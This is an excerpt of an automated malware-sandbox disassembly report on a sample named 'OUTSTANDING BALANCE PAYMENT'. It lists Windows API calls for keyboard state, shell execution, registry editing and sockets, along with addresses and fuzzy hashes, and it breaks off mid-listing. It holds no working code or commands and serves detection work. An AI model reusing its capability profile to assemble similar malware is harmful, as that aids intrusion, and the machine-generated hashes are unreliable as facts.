                                                          • Instruction ID: 915eb8df5b6379247e076585c1699962d6fa6136454e933b00b47381e1f2b4ea
                                                          • Opcode Fuzzy Hash: f8f76b8ee193a9c326da488de74c1f1868759620309b067362972140a94e0d16
                                                          • Instruction Fuzzy Hash: 04419B71604200AFDB05EF68C8E5F6DB7E5EF55700F04849DF906AF282DBB9A9048B95
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00BA58B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: c4fe4278d8faac102446db455aaff6f59a09624a44f3807444c31dfd3ef27ffe
                                                          • Instruction ID: 0e270f6251987577040b44d3d14adcf82e742928ecc36ebe68c798bbb7ce190f
                                                          • Opcode Fuzzy Hash: c4fe4278d8faac102446db455aaff6f59a09624a44f3807444c31dfd3ef27ffe
                                                          • Instruction Fuzzy Hash: C911EE7230D742BAE7216B549C82DAE23DCEF17354B2000BAF640A6281E7A89B405264
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00BAA806
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: d42f999e2c05cc9570e99c4ffec2e7ce40c137b746f6a059eef6f5254dfcb4d4
                                                          • Instruction ID: e319d91088924f29c8e6c2881ae07b0981255959359ee2b76a998b0d449b1f2a
                                                          • Opcode Fuzzy Hash: d42f999e2c05cc9570e99c4ffec2e7ce40c137b746f6a059eef6f5254dfcb4d4
                                                          • Instruction Fuzzy Hash: F3C1707590821ADFDB00DF94D481BAEB7F4FF0A315F2084AAE615E7381D735A941CBA1
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BA6B63
                                                          • LoadStringW.USER32(00000000), ref: 00BA6B6A
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BA6B80
                                                          • LoadStringW.USER32(00000000), ref: 00BA6B87
                                                          • _wprintf.LIBCMT ref: 00BA6BAD
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BA6BCB
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00BA6BA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: 7cbd368defaf16f06f5e4435b782cc112ef480e3a70ae392b4b6defb1cb5d6eb
                                                          • Instruction ID: 07c810669c2139e377936e21f45946f0e68c20a4ccc10af64dbf950b9029f888
                                                          • Opcode Fuzzy Hash: 7cbd368defaf16f06f5e4435b782cc112ef480e3a70ae392b4b6defb1cb5d6eb
                                                          • Instruction Fuzzy Hash: 85014FF2500248BFEB11A7949DC9EE633ACEB04304F4044A5B745EA051EAB4DE848F71
                                                          APIs
                                                            • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC2BF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharConnectRegistryUpper
                                                          • String ID:
                                                          • API String ID: 2595220575-0
                                                          • Opcode ID: 76212c43f434218e5fd4daec3e79f6a09df329365a0fc37c125a1b2756f8d705
                                                          • Instruction ID: 643f6c44307bde709ebc618b486164e470853fbdc9fdab1b758e4b3fa79f59c5
                                                          • Opcode Fuzzy Hash: 76212c43f434218e5fd4daec3e79f6a09df329365a0fc37c125a1b2756f8d705
                                                          • Instruction Fuzzy Hash: 0E916E716042019FCB01EF54C891F6EBBE5FF58310F04889DF9969B2A2DB75E945CB42
                                                          APIs
                                                          • select.WSOCK32 ref: 00BB9691
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB969E
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00BB96C8
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BB96E9
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB96F8
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00BB97AA
                                                          • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00BFDC00), ref: 00BB9765
                                                            • Part of subcall function 00B9D2FF: _strlen.LIBCMT ref: 00B9D309
                                                          • _strlen.LIBCMT ref: 00BB9800
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                          • String ID:
                                                          • API String ID: 3480843537-0
                                                          • Opcode ID: 8c31b2dd00d39629059b29e0662526619a6957a2c5bdf5848458879869ad28dc
                                                          • Instruction ID: ed2b0b8d5140f79ac3115a01d82f7281f3ad8968f5568133ed81d9761e5c1596
                                                          • Opcode Fuzzy Hash: 8c31b2dd00d39629059b29e0662526619a6957a2c5bdf5848458879869ad28dc
                                                          • Instruction Fuzzy Hash: 1B81BE71504240AFC710EF64CC85EABBBE8EF89710F144A9DF6559B2A1EBB0DD04CB92
                                                          APIs
                                                          • __mtinitlocknum.LIBCMT ref: 00B8A991
                                                            • Part of subcall function 00B87D7C: __FF_MSGBANNER.LIBCMT ref: 00B87D91
                                                            • Part of subcall function 00B87D7C: __NMSG_WRITE.LIBCMT ref: 00B87D98
                                                            • Part of subcall function 00B87D7C: __malloc_crt.LIBCMT ref: 00B87DB8
                                                          • __lock.LIBCMT ref: 00B8A9A4
                                                          • __lock.LIBCMT ref: 00B8A9F0
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00C16DE0,00000018,00B95E7B,?,00000000,00000109), ref: 00B8AA0C
                                                          • EnterCriticalSection.KERNEL32(8000000C,00C16DE0,00000018,00B95E7B,?,00000000,00000109), ref: 00B8AA29
                                                          • LeaveCriticalSection.KERNEL32(8000000C), ref: 00B8AA39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                          • String ID:
                                                          • API String ID: 1422805418-0
                                                          • Opcode ID: 92fe18c120e26487152d34aab2c0271cad68f5cdc4ebbba37bb87a551db9f25d
                                                          • Instruction ID: 2d425eaaa2a45c4a2fd80891501fbe3f63036b6101ebbd8970a3e61f7bc0a2f9
                                                          • Opcode Fuzzy Hash: 92fe18c120e26487152d34aab2c0271cad68f5cdc4ebbba37bb87a551db9f25d
                                                          • Instruction Fuzzy Hash: A8412D719002059BFB28BF68D98575CB7F0EF01335F20439AE425AB5F1DBB49941CB92
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00BC8EE4
                                                          • GetDC.USER32(00000000), ref: 00BC8EEC
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC8EF7
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00BC8F03
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00BC8F3F
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BC8F50
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BCBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00BC8F8A
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BC8FAA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 2edabddd1895c7ea0d2f462bf22269f658ebfdc9d8606f390406b9713b041a23
                                                          • Instruction ID: 0d7023ba58cf755422c0a0536f42cc46a95902eacb5b0f2f9adab2536117795b
                                                          • Opcode Fuzzy Hash: 2edabddd1895c7ea0d2f462bf22269f658ebfdc9d8606f390406b9713b041a23
                                                          • Instruction Fuzzy Hash: FD314D72100254BFEB118F50CC89FEA3BA9EF49755F084069FE099F191DAB59841CBB4
                                                          APIs
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                            • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                          • _wcstok.LIBCMT ref: 00BB184E
                                                          • _wcscpy.LIBCMT ref: 00BB18DD
                                                          • _memset.LIBCMT ref: 00BB1910
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: af89d6a105be7f4621492d7efc32c5e97203e50ab66e82e3c4618ae6036bc9ef
                                                          • Instruction ID: 37f762ec430198dd92c85e782281b83ed2f93ab3ade47f1ae4621b261ea6c982
                                                          • Opcode Fuzzy Hash: af89d6a105be7f4621492d7efc32c5e97203e50ab66e82e3c4618ae6036bc9ef
                                                          • Instruction Fuzzy Hash: 83C1A1716043409FC724EF28C991AAEB7E4FF85350F4449ADF899972A2DB70ED45CB82
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • GetSystemMetrics.USER32(0000000F), ref: 00BD016D
                                                          • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00BD038D
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BD03AB
                                                          • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00BD03D6
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BD03FF
                                                          • ShowWindow.USER32(00000003,00000000), ref: 00BD0421
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BD0440
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                          • String ID:
                                                          • API String ID: 3356174886-0
                                                          • Opcode ID: f6048382b0a9bae9198ad24df827fc218c0e45d577f8ef568bec8badb06db692
                                                          • Instruction ID: 44ac1223ffadb83be157387b9ef3921029997d9e898515d73e9286365158dca7
                                                          • Opcode Fuzzy Hash: f6048382b0a9bae9198ad24df827fc218c0e45d577f8ef568bec8badb06db692
                                                          • Instruction Fuzzy Hash: 99A17C35610616AFDB18DF68C9857ADFBF1FB48710F048196EC54AB390E774AD50CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2079cc878baba11460231c530b0951913362f15c64327f58d9559d235a8f563
                                                          • Instruction ID: ff44896d098520b86bac65bac8a4deb452b5ceec74d6ef009eac2a92cafb7e95
                                                          • Opcode Fuzzy Hash: b2079cc878baba11460231c530b0951913362f15c64327f58d9559d235a8f563
                                                          • Instruction Fuzzy Hash: 6E715C71904109AFCB14DF98CC85AAEBBB4FF85314F14C199F929AB251D730AA41CF65
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BC225A
                                                          • _memset.LIBCMT ref: 00BC2323
                                                          • ShellExecuteExW.SHELL32(?), ref: 00BC2368
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                            • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                          • CloseHandle.KERNEL32(00000000), ref: 00BC242F
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00BC243E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 4082843840-2766056989
                                                          • Opcode ID: d92cd30481e930a2c1b814af9206c3e2ce1119e2ed6d011b10f6623c5046aee2
                                                          • Instruction ID: 660fcf5dfd5ae73e46ebd0221f6392b3f8b9e5884a0b4ab0bbe2b5972886cff6
                                                          • Opcode Fuzzy Hash: d92cd30481e930a2c1b814af9206c3e2ce1119e2ed6d011b10f6623c5046aee2
                                                          • Instruction Fuzzy Hash: F5714D75A00619DFCF05EFA4C891AAEBBF5FF48310F1084A9E859AB351DB34AD40CB94
                                                          APIs
                                                          • GetParent.USER32(?), ref: 00BA3DE7
                                                          • GetKeyboardState.USER32(?), ref: 00BA3DFC
                                                          • SetKeyboardState.USER32(?), ref: 00BA3E5D
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BA3E8B
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BA3EAA
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BA3EF0
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BA3F13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: d88e2499d913dae74a9d66834ffad8c672322bafec5af31fcb24d5fc55d3ec02
                                                          • Instruction ID: 161c5bf7d3672d2a02555e5e82b2b689f7162c0cdb04096cd61a15594cac1358
                                                          • Opcode Fuzzy Hash: d88e2499d913dae74a9d66834ffad8c672322bafec5af31fcb24d5fc55d3ec02
                                                          • Instruction Fuzzy Hash: 1851C1A0A1C7D53DFB3643288845BBA7EE99B07B04F0845C9F0D55A8C2D7E5AEC4D760
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 00BA3C02
                                                          • GetKeyboardState.USER32(?), ref: 00BA3C17
                                                          • SetKeyboardState.USER32(?), ref: 00BA3C78
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BA3CA4
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BA3CC1
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BA3D05
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BA3D26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 8ba907bfa136d3caed965415ae1b4cad32806044cd4c924b669a744da24a63ae
                                                          • Instruction ID: b561571da5cf7ead1da1f629ac72c6c33f1ef31b4a2db53146f0872ef2e93e5d
                                                          • Opcode Fuzzy Hash: 8ba907bfa136d3caed965415ae1b4cad32806044cd4c924b669a744da24a63ae
                                                          • Instruction Fuzzy Hash: 9451F6A050C7D57DFB3287248C56BBABED9EB07B00F0884D9F0D55A8C2E695EE84D760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 6227f75828aea56832cc7578e1e83c4f237b0a25a05936e825c49f4e59ba051b
                                                          • Instruction ID: ee0c9c6c9aabc0544f1499c003b4f43b8c9172e6251c512251019ab395d61c03
                                                          • Opcode Fuzzy Hash: 6227f75828aea56832cc7578e1e83c4f237b0a25a05936e825c49f4e59ba051b
                                                          • Instruction Fuzzy Hash: A6414C66D29214BADB10BBF48C469CFB7ECEF05310F5089E6E905E3121FA34E615C7A9
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00BC3DA1
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BC3DCB
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00BC3E80
                                                            • Part of subcall function 00BC3D72: RegCloseKey.ADVAPI32(?), ref: 00BC3DE8
                                                            • Part of subcall function 00BC3D72: FreeLibrary.KERNEL32(?), ref: 00BC3E3A
                                                            • Part of subcall function 00BC3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BC3E5D
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BC3E25
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: c04163d2c2cf4484e5172ca1fa9bf1b32b45fed62340552e851b8bc6ad301e75
                                                          • Instruction ID: 75c77c46e929293fb12745e578fb3320a8fc7e90061251470334d543d41c06a4
                                                          • Opcode Fuzzy Hash: c04163d2c2cf4484e5172ca1fa9bf1b32b45fed62340552e851b8bc6ad301e75
                                                          • Instruction Fuzzy Hash: EA3118B1901209BFDB159B94DC89EFFB7FCEF08700F4041AAE512A6151DA709F899BB0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BC8FE7
                                                          • GetWindowLongW.USER32(0168E608,000000F0), ref: 00BC901A
                                                          • GetWindowLongW.USER32(0168E608,000000F0), ref: 00BC904F
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BC9081
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BC90AB
